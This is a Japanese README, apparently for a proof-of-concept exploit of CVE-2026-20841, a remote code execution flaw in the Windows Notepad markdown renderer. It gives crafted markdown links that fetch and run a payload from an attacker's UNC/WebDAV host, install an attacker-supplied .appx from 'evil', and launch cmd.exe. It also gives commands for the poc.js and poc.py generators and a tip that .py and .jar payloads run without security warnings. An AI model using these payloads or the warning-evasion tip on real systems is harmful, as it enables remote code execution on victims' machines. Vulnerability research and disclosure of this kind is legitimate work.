
CVE-2026-20841の概念実証エクスプロイト。マークダウンリンクを介したWindows NotepadのRCEです。リモートペイロード、アプリのサイドローディング、ローカルバイナリ実行をトリガーするために細工された.mdファイルを生成します。
Windows Notepad のマークダウンレンダラーにおけるリモートコード実行の脆弱性に対する PoC。このマークダウンエンジンは URL プロトコルを制限しておらず、クリック可能なリンクを介して任意のプロトコルハンドラーを起動できます。
file:///)[click](file:///\\attacker@5005\DavWWWRoot\payload.py)
file:/// プロトコルはリモートの UNC パスを解決します。ペイロードにリンクすると、クリック時に Windows がそれを取得して実行します。
ms-appinstaller://)[click](ms-appinstaller://?source=https://evil/xxx.appx)
攻撃者が提供する .appx/.msix パッケージでアプリインストーラーを開きます。
file://)[click](file://C:/windows/system32/cmd.exe)
ディスク上に既に存在する任意の実行可能ファイル(cmd.exe、powershell.exe、mshta.exe など)を起動します。
両スクリプトは、現在のディレクトリに細工されたリンクを含む poc.md を生成します。
node poc.js <host> <port> <payload/path>
python poc.py <host> <port> <payload/path>
# 例
node poc.js 192.168.1.100 5005 hello.py
notepad poc.md
テストペイロードは payloads/ にあります。
.exe、.lnk、.vbs および類似の拡張子は、Notepad の動作に関係なく Windows のセキュリティ警告をトリガーします。.py と .jar は警告なしで実行されます。安全に!